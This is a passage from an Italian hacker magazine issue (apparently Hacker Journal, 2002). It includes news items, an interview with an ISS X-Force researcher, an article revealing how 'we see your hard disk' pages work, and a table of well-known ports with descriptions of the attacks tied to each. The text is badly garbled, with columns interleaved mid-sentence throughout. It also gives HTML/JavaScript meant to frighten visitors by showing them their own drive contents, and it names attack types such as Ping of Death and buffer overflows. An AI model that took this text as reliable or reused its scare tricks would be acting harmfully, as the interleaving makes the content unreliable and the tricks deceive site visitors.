telefonica, la possibilità di chiamare i numeri Decisamente pochino, ma su Internet non c'è Ecco cosa compare nelle ultime righe del
con prefisso 899 (cosa già possibile per 144 pace per nessuno. documento, aprendolo con un editor
e 166). Gli 899 sono particolarmente insidiosi La ragazza era Valerie G. Mallinson (Shoreline, esadecimale "CommentsgTo[\x1E], Valerie
e costosi, perché sono spesso oggetto di Washington state), che intervistata da Mallinson (Wes Rataushk & Assc Inc)". Lo
spamming telefonico e dei dialer per Associated Press, ha confermato la storia: stesso nome della presunta testimonial. Che
computer. "Credo di poter dire il vero, ero io”. fortunata coincidenza, la stessa autrice del
Come era già accaduto per i numeri 144 e Nell'annuncio la ragazza sosteneva di aver template è anche una delle prime convertite.
166, Telecom ha cercato di respingere il più
possibile le richieste dei consumatori (perché
in realtà guadagna tantissimo trattenendosi
una fetta del traffico generato dai dialer), ma
ha dovuto recepire un invito piuttosto
esplicito da parte dell’Authority per le
telecomunicazioni. Da novembre sarà invece
possibile chiedere la disabilitazione di tali
numeri senza alcuna spesa in bolletta. Per
informazioni, basta chiamare il 187.

10 | www.hackerjournal.it
news

! LA RETE SUI FILI ELETTRICI


COOL!
hi vuole realizzare delle reti di computer in mettere in rete fino a 7 computer in due stanze

C edifici molto antichi si scontra spesso con


grandi difficoltà: le vecchie mura in
mattoni o pietra non sono semplici da scavare
diverse.
La sicurezza è affidata da un lato alla
separazione della rete elettrica nel punto in cui
! HACKERJOURNAL.IT
VERSIONE 2.0!
per realizzare canaline che possano ospitare i è presente il contatore (che introduce disturbi
cavi, e costituiscono spesso uno schermo che impediscono la trasmissione dei dati), e Alcuni lettori si sono un po’ lamentati
impenetrabile per le onde radio delle reti dall’altro ai protocolli ultimamente perché il sito della rivista non
wireless. In più, le leggi a protezione dell’arte di cifratura era molto aggiornato, o perché si sono
impediscono o limitano la realizzazione supportati. manifestati alcuni problemi. Il motivo è
di opere murarie. L’unica soluzione è presto detto: il fido Bismark stava lavorando
quella di utilizzare una rete già a una nuova e più ricca versione del sito.
esistente, come quella elettrica. Ci ha In questi giorni stiamo testando il nuovo
pensato Digicom, che con il suo Power motore e la nuova grafica, probabilmente nei
Switch 10/100 permette di sfruttare la primi giorni potrebbe esserci qualche
rete elettrica dell’edificio o problemuccio nel passaggio: voi segnalatici
dell’appartamento per convogliare, oltre alla ogni inconveniente, ma portate anche un po’
corrente elettrica, anche dati fino a una di pazienza.
velocità di 14 Mbit/sec. Lo switch ha quattro
porte, più una spina per collegarlo a una
qualsiasi presa elettrica. Collegando un altro
switch a un’altra presa, si potranno quindi

! PERSINO LA BSA È CONTRO


IL “PIZZO” SUI CD-ROM
’aumento della tassazione sui supporti vergini, un altro effetto perverso del decreto

L vergini, proposto da una bozza di decreto


legislativo, e che dovrebbe scoraggiare la
pirateria, non piace nemmeno a chi la
legislativo potrebbe essere la nascita di una
nuova forma di contrabbando, quello dei
supporti vergini. Se il costo reale di
pirateria la combatte tutti i giorni. un CD vergine è di 30 o 40
In un incontro organizzato da centesimi, ma il suo prezzo
ASMI, ANIE e ANDEC, BSA nei negozi supera l’euro
Italia si è unita alle proteste per via delle tasse, non
di produttori e distributori è difficile pensare che,
di supporti vergini, accanto ai giochi ! COMMODORE 64
associazioni per la tutela masterizzati e alle
dei consumatori e videocassette pirata,
PORTATILE A 1 GHZ!
difensori delle libertà i mercatini di tutta
digitali. Secondo la BSA, Italia verranno invasi La voglia di tenere in vita un vecchio
non è giusto far pagare un da milioni di supporti computer aggiornandone i componenti è
esercizio legittimo, come importati illegalmente. lodevole, ma a volte si esagera. Un tizio è
quello della copia personale, (Ah, prima che qualcuno riuscito a creare un sistema basato su
per due o tre volte (il diritto faccia il secchione, lo Pentium 4 a 1 GHz utilizzando il case e alcuni
d’autore sull’opera, più la tassa sappiamo benissimo che il componenti del Commodore 64 SX (quello a
sul supporto e quella demone accanto al CD nella foto forma di valigia, con monitor integrato). Tutti
sull’apparecchio di registrazione). è il logo di BSD, che con BSA non i dettagli sono su http://sx64.opsys.net
Secondo i produttori e distributori di supporti c’entra nulla. È che era così simpatico…)

DETTI & CITAZIONI

INFINTO, LOOP: VEDI “LOOP INFINITO”


LOOP INFINITO: VEDI “INFINITO, LOOP”
> Da un dizionario dei termini informatici

www.hackerjournal.it | 11
personaggio

INTERVISTA A KENNETH DE SIEGELEIRE

KENNETH
DE SIEGELEIRE
A 27 anni è un pezzo grosso di un’importante azienda di
sicurezza, e per lui l’unico hacker buono è quello in gabbia


L
HJ: Kenneth, che cos'è X-Force? de produttrici di software e di hardware, per
KDS: Il team di X-Force è il più grande gruppo capire le debolezze dei loro prodotti prima
di ricerca privato per la sicurezza informatica: che arrivino sul mercato. La seconda politi-
intuizione è venuta quasi dieci siamo più di ottanta persone, la maggior ca consiste nel lavorare molto con le reali
anni fa a uno studente venten- parte delle quali lavora ad Atlanta. Ma mol- apparecchiature dei nostri clienti, perché
ne del Georgia Institute of ti, come me che lavoro in Europa, sono dis- ogni installazione è diversa dalle altre e può
Technology di Atlanta, nel Vecchio Sud degli locati in varie parti del mondo. All'inizio era- presentare debolezze che le sue singole
Stati Uniti: sensori anti-intrusione e difesa vamo il team dedicato solo alla ricerca per la componenti, prese una per una, non han-
perimetrale. Oggi Christopher Klaus e il suo sicurezza informatica all'interno di ISS. Ades- no.
amico che studiava Economia e Commer- so, siamo diventati qualcosa di più comples- C'è poi un terzo modo che in realtà non ha
cio, Thomas Noonan, su quell'intuizione so, perché la nostra ricerca viene integrata una procedura ben definita ma che è co-
hanno costruito Internet Security System all'interno dei nostri prodotti, e svolgiamo an- munque molto importante. Siamo in contat-
(ISS), una delle più grandi aziendae nel che attività di consulenza. to con esperti di sicurezza che potremmo
campo della sicurezza informatica. E anche chiamare White Hat Hacker, cioè persone
sponsor, insieme a Microsoft e Oracle, della Che tipo di consulenza? che seguono regole etiche che li rendono
conferenza organizzata a Parigi poche setti- Andiamo sul campo per svolgere un lavoro a differenti dai cosiddetti Black Hat. Frequen-
mane fa da RSA Security, altro mostro sacro più diretto contatto con i nostri clienti, e of- tiamo anche le mailing list, i siti web, i ca-
della sicurezza e della crittografia. friamo anche un'analisi dei loro sistemi effet- nali chat dove queste persone solitamente
All'interno del mastodontico Centro Con- tuando test di penetrazione, per vedere che sono, e cerchiamo di accumulare esperien-
gressi Concorde La Fayette, dove per tre tipo di rete hanno implementato e quanto è za e informazioni relative ai tipi di attacco
giorni si sono dati appuntamento gli esperti sicura. Quando sono attaccati dall'esterno, che vengono sviluppati.
della sicurezza, cioè i "bravi ragazzi" che cerchiamo di capire esattamente come mai e
ogni giorno cercano di proteggere le azien- in che modo, e poi li aiutiamo a realizzare un Può farmi qualche esempio di siti do-
de dalle intrusioni informatiche dei "cattivi meccanismo di risposta, un "incident pro- ve siete presenti?
ragazzi" della rete, abbiamo intervistato cess". Cioè, che cosa fare quando si accor- C'è un sito in Sud Africa che è abbastanza
Kenneth De Siegeleire, ventisettenne belga, gono che sono sottoposti ad un attacco. importante all'interno della comunità hac-
due master in ingegneria elettronica e sicu- ker: www.hack.co.za.
rezza dei network, con una forte competen- Fate anche attività di "intelligence"? Ma ce ne sono anche molti altri, ovviamen-
za sulla crittografia. Lavora per ISS ed è a Per fare "intelligence", cioé capire prima quel- te. E noi non siamo certamente i soli, dato
capo della divisione europea di X-Force. lo che succede ed essere in grado di preve- che per esempio l'Fbi effettua monitoraggi
Cerchiamo di capire che lavoro fa, quali so- dere gli attacchi, abbiamo stabilito tre diffe- molto approfonditi di questi posti dove gli
no le procedure seguite per creare la sicu- renti politiche. La prima consiste nelle strette hacker si trovano per scambiarsi informa-
rezza e chi pensa che siano i suoi "nemici". relazioni che abbiamo stabilito con le azien- zioni e dove può comparire anche qualche

12 | www.hackerjournal.it
Black Hat che racconta alcune violazioni che si considerano in qualche modo dei veri locemente possibile. L'unico motivo per cui
ha commesso recentemente. Qui scopriamo esperti: attaccano sistemi che appartengono potremmo essere interessati alla cultura
le nuove tecniche di attacco contro debolez- a strutture di alto o altissimo livello, come hacker, come accade qualche volta, è
ze che non erano ancora state individuate. grandi aziende, entità governative, grandi quando siamo chiamati come consulenti le-
fornitori di servizi. Quello che cercano di fa- gali in un processo in cui il giudice vuole ca-
Alcuni mesi fa ho visitato il vostro re è dimostrare l'esistenza di debolezze in pire quali sono le motivazioni, anzi il mo-
Quartier Generale di Atlanta, e lì quei sistemi, per far vedere non solo quanto vente che ha spinto l'imputato ad agire in
Christopher Klaus mi ha detto che og- sono competenti loro, ma anche quanto so- un certo modo, e quale gruppo di hacker
gi un Pc collegato a Internet per 24 no incompetenti queste organizzazioni. Co- ha concretamente realizzato un attacco.
ore di fila, viene automaticamente me i vigilantes, che ritengono di avere la leg-
violato. E' vero? ge nelle loro mani, vogliono decidere loro OK, proviamoci in un altro modo: qual è
Si, un giorno o poco più, se non viene in- che cosa è giusto e sbagliato. il vero rischio per un'azienda oggi? At-
stallato nessun software di protezione. Ad Infine, la quarta categoria è quella peggio- tacchi di hacker da fuori oppure di im-
esempio, ogni volta che io mi collego a In- re. Sono gli hacker di professione. E' vera- piegati "infedeli" dall'interno?
ternet da casa il mio sistema rileva dei ten- mente molto raro incontrarli, non solo per- Molte statistiche riportano che la maggior
tativi di intrusione. Questi sono gli attacchi ché sono pochi ma anche perché sono mol- parte degli attacchi viene dal di fuori di
automatici, una cosa che stiamo vedendo to bravi. Riescono ad evitare la maggior par- un'azienda, attraverso Internet. Questo, al-
sempre più spesso nell'ultimo anno. te dei sistemi di intrusion detection, meno, è quello che si può leggere sui log
Ad esempio, alcuni mesi fa la media sanno essere mol- dei sistemi di intrusion detection. Ma ci so-
era già diventata di una cinquantina di to pazienti, aspet- no anche quelli che vengono dall'interno,
malicious request tramite la porta http tare anche per perpetrati da parte dei dipendenti stessi. La
ogni ora. Cosa significa: erano tenta- mesi, raccogliendo mia idea è che la maggior parte degli at-
tivi da parte di Code Red di capire se informazioni in tacchi vengano da fuori, da un punto di vi-
su un computer stava funzionando un modo passivo, la- sta quantitativo. Ma il più alto numero di at-
server Microsoft IIS e se era una ver- vorando sopra un tacchi che vanno a buon fine vengono dal
sione attaccabile o no. Non c'era attacco che poi ri- di dentro: gli impiegati conoscono meglio
nessuno che stava cercando delibe- chiede al massimo la rete interna, ha motivi specifici, sanno co-
ratamente di attaccare il Pc, avveni- due secondi per es- sa cercare.
va tutto in modo automatico attra- sere eseguito. Non
verso Internet. lo fanno gratuita- Quindi, almeno sul fatto che gli hac-
mente, ma sono ker non sono il pericolo principale
Chi c'è dietro a questi attacchi? quasi sempre colle- per un'azienda, siamo d'accordo.
Gli hacker. Ne esistono vari tipi: la gati a fenomeni di Un'ultima domanda: per voi lavora
definizione minima di hacker è spionaggio industriale qualche hacker o ex-hacker?
quella di un appassionato curioso di infor- e adesso in qualche No, assolutamente. Abbiamo un accordo
matica. Sono persone curiose anche di sicu- caso anche alla criminalità organizzata e a con tutti i nostri clienti, in base al quale que-
rezza, e cercano di capire come possano es- certi tipi di terrorismo. sto non è possibile. Consideri che noi ve-
sere violate le altre macchine. Non li assolvo diamo tutte le debolezze all'interno dei si-
in nessun modo, perché quello che fanno Quindi gli hacker per voi sono solo stemi informatici dei nostri clienti. Alla fine,
può causare comunque danni, dato che non una minaccia oppure sapete che esi- il lavoro sulla sicurezza è basato essenzial-
sanno precisamente quello che stanno facen- stono anche come cultura? Vi interessa mente sulla fiducia. Le aziende che ci chie-
do. Sono studenti, giovani, ma possiamo im- questo fatto? dono una consulenza debbono essere sicu-
maginare che ci siano anche altre persone, Per essere onesti, non spendiamo tempo a re che le persone del nostro staff siano per-
magari pensionati innamorati dei Pc. indagare la cultura hacker di per sè. Certo, sone di fiducia. Molti dei nostri dipendenti ci
Poi c'è una seconda categoria, quelli che po- quasi tutte le maggior parte delle convention devono presentare delle credenziali da par-
tremmo chiamare i vandali, gli hooligans. di hacker vedono anche la presenza di con- te dei loro governi per essere sicuri che sia-
Come le tifoserie più violente fanno danni sulenti per la sicurezza informatica, per stu- no incensurati e non abbiamo alcun tipo di
solo per il gusto di fare danni, di rompere le diare l'evoluzione della scena internazionale. precedente penale in campo informatico e
cose. Attaccano i sistemi informatici ma sen- Abbiamo bisogno di essere aggiornati su non. Per questo non lavoriamo con free-
za neanche la scusa della curiosità. Al limite, quello che succede. Ma la cosa finisce lì. lance entusiasti della sicurezza, o con per-
vogliono farsi una reputazione come i più Non abbiamo nessuna utilità a partecipare a sone di cui non siamo certi, o che si pre-
bravi hacker. quello che lei definisce "la cultura hacker". sentano come "esperti" di sicurezza, se non
Poi, c'è una terza categoria, gli evangelisti Alla fine, il nostro obiettivo è quello di sco- li conosciamo bene.
della sicurezza, una sorta di vigilantes. Loro prire nuove debolezze nei software il più ve- aDm

www.hackerjournal.it | 13
internet

Ti spiO dal
sitO
Navigando nei siti dedicati all’hacking, spesso capita di
imbattersi in pagine che, apparentemente, mostrano il
contenuto del nostro disco, o informazioni sulla connessione:
in realtà si tratta di semplici e innocui trucchi. Eccoli svelati.
PICCOLI TRUCCHI CHE METTONO MOLTA PAURA

I n molti siti riguardanti il mondo dell’Hacking si posso-


no trovare pagine che mostrano il contenuto del nostro
Hard-Disk oppure quello del Cd-Rom o ancora la ver-
sione del browser e sistema operativo utilizzato. E
qualcuno si chiede se sia davvero così facile spiare il contenuto
di un disco su Internet. Spesso queste pagine hanno titoli come:
neggiarci! Infatti tutto questo e solo un trucco creato inserendo
nel sorgente della pagina un oggetto che fa riferimento al con-
tenuto dell’hardisk.

>> Anche noi!


“Mmmh… vediamo cosa c’è nel tuo HD…” oppure “Ti vedo!!” Vediamo ora qualche
o ancora “Che bell’HD quasi quasi…”. Per esempio nel nume- esempio di codice da
ro 10 di HJ un lettore scriveva che pur avendo firewall e nessu- poter inserire nel nostro
na condivisione, andando su un sito vedeva tutto ciò che c’era sito, così finalmente sa-
nel suo HD. remo noi a fare spaven-
Non bisogna affatto spaventarsi! tare i visitatori! :D (
Questo codice, inserito
>> Ecco come fanno! in una pagina Html già
esistente, serve a visualiz-
Quello che noi vediamo è un semplice collegamento alla car- zare il contenuto del pri-
tella del nostro Hard-disk che solo ed esclusivamente noi pos- mo Hard-disk dell’utente
siamo vedere. Quindi non c’è nessun pericolo che il webmaster (cioè quello con lettera di
(che si gasa tanto per niente…) possa fare qualcosa per dan- identicazione C:) tra l’HD del
un esempio di sito che mos
Ecco
visitatore…

14| www.hackerjournal.it
>>
metro VALUE alla riga:
<TABLE border=0 cellSpacing=0 width=400>
<PARAM NAME="Location"
<TR>
VALUE="d:">
<TD>
<CENTER>
>> Informazioni sull’utente
<OBJECT align=baseline
classid=clsid:EAB22AC3-30C1-11CF-A7EB-
Nelle stesse pagine, a vol-
0000C05BAE0B height=250 id=browserIcons width=500 te vengono visualizzate
border="3"> anche altre informazioni,
<PARAM NAME="Location" VALUE="c:"> come la marca e la versio-
<PARAM NAME="AlignLeft" VALUE="1"> ne del browser utilizzato,
oppure la risoluzione im-
<PARAM NAME="AutoSize" VALUE="0"> postata sul monitor. In que-
<PARAM NAME="AutoSizePercentage" sto caso, queste informa-
VALUE="100"> zioni sono effettivamente
<PARAM NAME="AutoArrange" VALUE="1"> conosciute dal Webmaster,
in quanto fanno parte della richiesta Http inviata dal browser al
<PARAM NAME="NoClientEdge" VALUE="false"> server, e vengono quindi memorizzate nel file di log. Come fare
<PARAM NAME="ViewMode" VALUE="4"> però a visualizzarle all’interno di una pagina? Uno dei modi più
</OBJECT> semplici è quello di utilizzare Javascript.
</CENTER> Javascript è un linguaggio per creare script, sviluppato da Net-
scape. Non è un vero linguaggio di programmazione come il lin-
</TD>
guaggio Java, perché non permette di creare applicazioni auto-
</TR> nome. Infatti Javascript è un codice scritto all'interno delle pagi-
</TABLE> ne HTML che viene interpretato dal client mentre viene letta la
pagina HTML, e non può essere eseguito fuori dal browser Web.
Java è invece un linguaggio che permette di costruire applica-
Quest’altro codice invece, permette di visualizzare il secondo HD, se
zioni che possono essere eseguite all'interno di qualsiasi sistema
presente, altrimenti visualizza il contenuto del Cd-Rom (sempre se c’è operativo. Occorre solo una macchina virtuale Java; perciò non
un CD all’interno): è indispensabile un browser Web.
Solitamente basta leggere il sorgente delle pagine HTML per sco-
<TABLE border=0 cellSpacing=0 width=400> prire come sono state costruiti gli script Javascript utilizzati al suo
<TR> interno (se l’autore non ha cifrato in qualche modo il codice o
<TD> non lo ha nascosto in altri modi). Questo significa che basta fa-
<CENTER> re un semplice “copia ed incolla” per poter inserire in una pagi-
<OBJECT align=baseline classid=clsid:EAB22AC3- na quello che ti serve, preso da pagine già esistenti. Con questo
30C1-11CF-A7EB-0000C05BAE0B height=250 script non solo si possono fare i trucchetti che vedremo dopo, ma
id=browserIcons width=500 border="0"> permette anche di inserire in un sito moltissime altre cose utili.
<PARAM NAME="Location"
VALUE="d:"> Adesso vediamo come si può visualizzare il tipo e la versione del
<PARAM NAME="AlignLeft" Browser utilizzato dall’utente:
VALUE="1">
<PARAM NAME="AutoSize" <SCRIPT language=JavaScript>
VALUE="1"> <!--
<PARAM NAME="AutoSizePercentage" VALUE="100"> browser = (((navigator.appName == "Netscape")
<PARAM NAME="AutoArrange" VALUE="1"> && (parseInt(navigator.appVersion) >= 3 )) ||
<PARAM NAME="NoClientEdge" VALUE="false"> ((navigator.appName == "Microsoft Internet Ex-
<PARAM NAME="ViewMode" VALUE="4"> plorer") && (parseInt(navigator.appVersion) >=
</OBJECT> 4 )))
</CENTER> if (!browser) document.write('<CENTER><font si-
</td> ze="3" color="###8000">ATTENZIONE!!!<BR>Stai
</tr> usando:<BR>' + navigator.appName + ' ' + naviga-
</TABLE> tor.appVersion + '</font></CENTER>')
if (browser) document.write('<center><font si-
Allo stesso modo, per visualizzare eventuali altri volumi (ulteriori ze="3"></A><BR><BR><BR><BR><B>STAI
dischi per esempio) basta sostituire la lettera di unità nel para- USANDO...<BR>'+navigator.appName+ ' ' +naviga-

www.hackerjournal.it |15
>>
PICCOLI TRUCCHI CHE METTONO MOLTA PAURA

tor.appVersion+'</font></center>') script, e la sua gestione degli eventi collegati all’uso del


// --> mouse.
</SCRIPT>
<SCRIPT LANGUAGE="JavaScript">
Con quest’altro codice si può visualizzare la risoluzione del monitor for (var i=0; i<document.images.length; i++) {
adottata dall’utente: document.images[i].onmousedown=destro
}
<SCRIPT language=JavaScript1.2>
<!-- Attiva il Cloaking for (var i=0; i<document.links.length; i++) {
// Usato per indicare che viene supportato JS1.2 document.links[i].onmousedown=destro
right_browser=true; }
// Cattura la risuluzione dello schermo function destro(ev) {
width = screen.width; if (navigator.appName == 'Netscape' &&
height = screen.height; (ev.which == 3 || ev.which == 2)) {
color = screen.colorDepth; alert("Cosa vuoi fare?");
// Disattiva il Cloaking --> return false
</SCRIPT> }
else {
<SCRIPT language=JavaScript> if (navigator.appName == 'Microsoft
<!-- Attiva la Cloaking Device Internet Explorer' &&
// Se il browser supporta JS1.2 (event.button == 2 || event.button ==
if(right_browser) 3)) {
{ alert("Cosa vuoi fare?");
document.open(); }
document.write("<CENTER>STAI UTILIZZANDO UNA return false
RISOLUZIONE GRAFICA DI....<BR>"); }
document.write(width + " x " + height + " a " return true
+ color + " bit"); }
document.write("</B></FONT></CENTER>");
} document.onmousedown=destro
// Se il browser non supporta JS1.2 - visualizza if (document.layers) {
il nome e la versione del browser e un messaggio window.captureEvents(Event.MOUSEDOWN)
else window.onmousedown=destro
{ }
document.open(); </script>
document.write("<CENTER>");
document.write("<FONT In questo caso il messaggio di alert è "Cosa vuoi fare?"
SIZE='+1'><B>"+browser+"</B></FONT><BR><BR>"); ma potete cambiarlo a vostra scelta. K
document.write("<FONT SIZE='+1'><B>does not
support JavaScript1.2.</B></FONT></CENTER>"); SN4KE©
} sn4ke@libero.it

// Disattiva il Cloaking -->


</SCRIPT>
Imparare JavaScript
Come abbiamo visto, spesso è possibile copiare uno
>> Altri subdoli trucchi script da una pagina qualsiasi, per riutilizzarlo nel
proprio sito, magari cambiando qualche dettaglio. Se
Vediamo infine come è possibile
però, come è giusto che sia, siete spinti dal desiderio
disabilitare, con un
messaggio di avviso, il di conoscenza e volete imparare a scrivere degli
tasto destro del mouse script tutti vostri, potete partire da questi siti per im-
per non permettere di parare Javascript.
copiare dal nostro sito
sfondi, icone, immagini www.html.it/guide.htm
eccetera. Il nostro fedele www.manuali.net (cercate JavaScript)
alleato è sempre Java-
http://web.tiscali.it/genero/javascript/
co un esem
pio di alert
el mouse. al click dest
ro
16 | www.hackerjournal.it
17_19_hj12_porte 30-10-2002 9:34 Pagina *17

Networking

>>

LE PORTE DI RETE PIÙ NOTE E I SERVIZI ASSOCIATI

To c t o c …
chi bussa alla tua porta?
chi bussa alla tua porta?
Anche un computer senza finestre (senza Windows) per comunicare con gli altri
utilizza le porte di comunicazione

L
e porte sono dei canali attra- fin troppo facile entrare all’interno dell’abi- presentano altro che i terminali di comuni-
verso cui avviene la trasmis- tazione… nel nostro PC. La soluzione?? Ov- cazione all’interno dei sistemi e fra i diffe-
sione input/output del sistema vio…tenere tutte le porte chiuse! Ma se ten- renti sistemi, e stilano un elenco usato dal
con l’ambiente esterno, nel go tutte le porte chiuse cosa succede? Suc- demone dei servizi. La differenza tra i due ti-
nostro caso la rete. In pratica cede che diventa impossibile l’interazione pi sta nel fatto che la connessione TCP è as-
possiamo dire che sono tanti con l’esterno ed il vostro PC si trasforma in sociata a una sincronizzazione dei numeri di
corridoi preferenziali, ognuno una macchina da scrivere solo leggermente acknowledgement, portando ad una con-
dei quali associato ad un’applicazione ben più evoluta. Diviene quindi necessario nessione affidabile, mentre la UDP è anche
precisa e che fornisce possibilità di trasferi- cercare di trovare una soluzione in- chiamata “best-efford”, data la presenza di
mento dati con altre macchine. Le porte, co- termedia che sia un giusto mix fra si- un datagram senza connessione. Per uno
me vedremo, sono tantissime, ma in questa curezza e possibilità di utilizzo della studio più accurato si consiglia di controlla-
prima parte andremo a dare significato “so- rete. re i documenti RCF 768-793. Fatte queste
lo” alle prime 1024, denominate porte Come sempre prima di vedere le soluzioni precisazioni andiamo quindi ad analizzare
note, che sono direttamente associate ai andiamo ad analizzare il problema, elen- le porte note vedendo prima i servizi TCP
servizi di sistema. cando una per una tutte le porte coi relativi (nella Tabella 1) e poi quelli UDP (Tabella 2).
Per capire il concetto di pericolosità di una servizi, esaminando i loro punti deboli e cer- Come risulta ovvio, è impossibile andare ad
porta aperta si potrebbe fare, cadendo un cando di capire come porvi rimedio. analizzare le porte una per una data la loro
po’ sul banale, il classico esempio della por- Tanto per dare una definizione scolastica quantità, ma cercheremo di vedere le più
ta di casa. Nel momento in cui un ladro tro- possiamo dividere le porte in due categorie note e le più utilizzate dai cracker per otte-
vasse una di queste porte aperta, sarebbe diverse: TCP e UDP. Queste porte non rap- nere accesso ad un PC.

www.hackerjournal.it |17
17_19_hj12_porte 30-10-2002 9:34 Pagina *18

Networking

Porta 11
E’ associata al systat, servizio che in pratica
serve per tenere d’occhio tutti i processi at-
tivi su un determinato PC. La sua vulnera-
bilità consiste nel fatto di permettere a un
attaccante di controllare le applicazioni at-
tive e ricavare informazioni sulla vittima.
Porta 15
Associata al servizio netstat fa in modo di
poter controllare tutte le connessioni attive
sulla macchina.
Porta 19
Associata al servizio chargen; questo servi-
zio, di per sé innocuo, diventa pericoloso

? ICMP: Internet Control Message


Protocol: servizio che invia pac-
chetti di messaggio riferendo er-
rori o informazioni sia sulla sta-
zione trasmittente che su quella
ricevente; i messaggi ricevuti vanno sotto
numeri dallo 0 al 18, rognone dei quali
associato ad un messaggio particolare.

In questa schermata si possono vedere tutte le connessioni attive nel momento sul PC in cui
viene eseguito il comando, coi relativi indirizzi internet e con le porte associate. se si sfrutta un bug che permette di reindi-
rizzare alcune stringhe a un daemon parti-
colare, ovvero il DNS. Di fatto queste
TABELLA 1: porte TCP e servizi associati Porta 7 stringhe disattivano il servizio su cui
Numero porta Servizio associato È associata al servizio echo, modulo di co- sono redirette.
municazione fra due PC. Viene utilizzata
7 Echo 115 Sftp principalmente dal servizio PING; questo Porta 21
9 Discard 117 Path servizio (Packet InterNet Grouper) funziona Porta associata al servizio FTP. Questo ser-
11 Systat 119 nntp trasmettendo un segnale tipo PING a cui il vizio permette di inviare dati, riceverli, ef-
13 Daytime 135 Loc-serv
15 Netstat 139 Nbsession ricevente risponde con un segnale tipo fettuare operazioni quali lo spostamento,
17 Quotd 144 News PONG. Serve per controllare la comunica- la cancellazione e la creazione di nuovi fi-
19 Chargen 158 Tcprepo zione fra due punti della rete. L’exploit più les o directory all’interno del PC remoto.
20 FTP-data 170 Print-srv noto associato a questa porta si chia-
21 FTP 175 vmnet ma Ping of Death, ed è basato sull’invio Porta 23
23 telnet 400 Vmnet0
25 SMTP 512 Exec di un pacchetto di dimensioni elevate (supe- Il servizio associato è Telnet, che viene utilizza-
37 Time 513 Login riore a 65536 bytes). Il sistema non è in to come standard per le connessioni remote
42 Name 514 Shell grado di elaborarlo correttamente e il risul- via Internet. I cracker usano dei punti deboli di
43 Whois 515 Printer tato è un blocco o un riavvio del sistema questo daemon per inviare degli script che,
53 Domain 520 Efs stesso. Un altro attacco utilizzato è il Floo- causando dei buffer-overflow, normal-
57 Rtp 526 Tempo
77 Rje 530 Courier ding che, basandosi sull’invio massic- mente danno accesso root alla macchi-
79 Finger 531 Conference cio di richieste ICMP, satura le risorse na remota.
80 http 532 Netnews del sistema di fatto bloccandolo.
87
95
101
102
103
Link
Supdup
Hostnames
Iso-tsap
Dictionary
540
543
544
556
600
Uucp
Klogin
Kshell
Remotefs
Garcon ?
PING: invio di un segnale a cui
un PC remoto risponde con un
altro (PONG); serve per assicu-
rarsi che ci sia comunicazione fra
? ROOT: accesso “illimitato” ad
una macchina unix o unix-like.
Normalmente destinato agli
amministratori di sistema, è la
chiave fondamentale per un
104 X400-snd 601 Maitrd due punti della rete. hacker per poter agire liberamente all’in-
105 Csnet-ns 602 Busboy terno di un PC.

?
109 Pop2 750 Kerberos FLOOD: invio massiccio di ri-
110 Pop3 751 Kerberos-mast chieste ICMP a cui il PC remoto
111 Portmap 754 Krb-prop non sa rispondere e reagisce con Porta 25
113 Auth 888 Erlogin un blocco dei sistema per esauri- E’ una porta associata ai servizi SMTP di
mento di risorse.

18 | www.hackerjournal.it
17_19_hj12_porte 30-10-2002 9:34 Pagina *19

Tabella 2: porte Udp e servizi associati


Numero porta Servizio associato
>>
7 Echo 514 Syslog
9 Discard 515 Printer
13 Daytime 517 Talk
17 Qotd 518 Ntalk
19 Chergen 520 Route
37 Time 525 Timed
39 Rlp 531 Rvd-control
42 Name 533 Netwall
43 Whois 550 New-rwho
53 Dns 550 Monitor
67 Bootp 561 Monitor Come si vede, a un comando PING di un indirizzo IP, corrisponde una risposta di tipo PONG,
69 Tftp 700 Acctmaster il che sta a significare che esiste una comunicazione fra i due PC.
111 Portmap 701 Acctslave
123 Ntp 702 Acct
137 Nbname 703 Acctlogin Porta 79 quando nel PC remoto è in funzione un si-
138 Nbdatagram 704 Acctprinter L’attacco associato a questa porta serve a stema X-Windows. I cracker sfruttano questo
153 Sgmp 705 Acctinfo
161 Snmp 706 Acctslave2 conoscere informazioni riservate sull’utente daemon per catturare finestre e fare
162 Snmp-trap 707 Acctdisk operazioni di keylogging.
315
500
512
513
Load
Sytek
Biff
Who
750
751
752
753
Kerberos
Kerberos-mast
Passwd-server
Userreg-server
? BUFFER-OVERFLOW: tecnica
di esaurimento delle risorse di un
computer. I PC dopo questo at-
tacco di solito reagiscono dando
possibilità di eseguire comandi
Porta 513 e 514
Porte di login e di shell; la loro presenza con-
temporanea pone a favore dell’attivazione di
come utenti root. un sistema X-Windows che può essere sfrut-
posta elettronica. Vengono sfruttati dei punti tato da una sessione telnet.
deboli del sistema per condurre attacchi ti- attaccato. In un output proveniente dalla
po DoS o mail-bombing. macchina sottoposta ad attacco si possono Porta 520
ricevere dettagli importanti sul pro- Associata al servizio RIP del routing, lo snif-
Porta 43 prietario del PC. fing di questa porta può produrre informa-
Porta correlata al servizio WhoIs: non è utiliz- zioni sensibili sulla topologia della re-
zata direttamente per attacchi alle macchine, Porta 80 te attaccata.
ma viene interrogata insieme ad altri E’ la più nota, quella associata al servizio
database per ricercare informazioni. http. I vari exploits puntano tutti al cambia- Porta 543, 544, 750
mento delle pagine web ed al defacciamen- Associate ai servizi klogin, kshell e kerberos;
Porta 53 to dei siti, basandosi sulla possibilità di sono demoni che servono per trasferire in
Il servizio domain è quel daemon che per- eseguire comandi in remoto. maniera sicura dati che viaggiano su una re-
mette di risolvere gli indirizzi testuali in indi- te non sicura, stabilendo una comunicazione
rizzi numerici IP. Lo spoofing di questi servizi Porta 111 e 135 a chiave univoca per ogni utente. Sono servi-
permette di indirizzare i visitatori di Sono associate ai servizi portmap e loc-serv. zi soggetti ad attacchi overflow e spoof
pagine Web verso link diversi dagli Il primo serve per convertire i numeri dei se non adeguatamente filtrate.
originali. Questa porta viene anche sfrutta- programmi in numeri di porte dando di fatto
ta per attacchi tipo DoS. una lista delle applicazioni attive. Il secondo CAT4R4TTA,
è l’equivalente nei sistemi NT. c4t4r4tt4@hackerjournal.it
Porta 67
E’ associata al servizio bootp, attivo sulle Porta 512
workstations. Ha un punto debole nel fatto Il servizio exec viene utilizzato per l’esecuzio-
di essere soggetta ad attacchi di tipo ne di processi remoti. Questa porta è attiva
buffer-overflow che blocca-
no il sistema. Il tftp è un servizio simile all’FTP ma più basilare, usato normalmente nella programmazione dei routers.

Porta 69
Il servizio tftp è una versione
semplificata dell’FTP che non
richiede username o password
per l’accesso. Viene di solito
utilizzata per la programmazio-
ne dei router. Il suo bug sta nel
fatto che si possono facil-
mente scaricare i files pre-
senti all’interno dei router
stessi che poi possono essere
letti o decifrati.

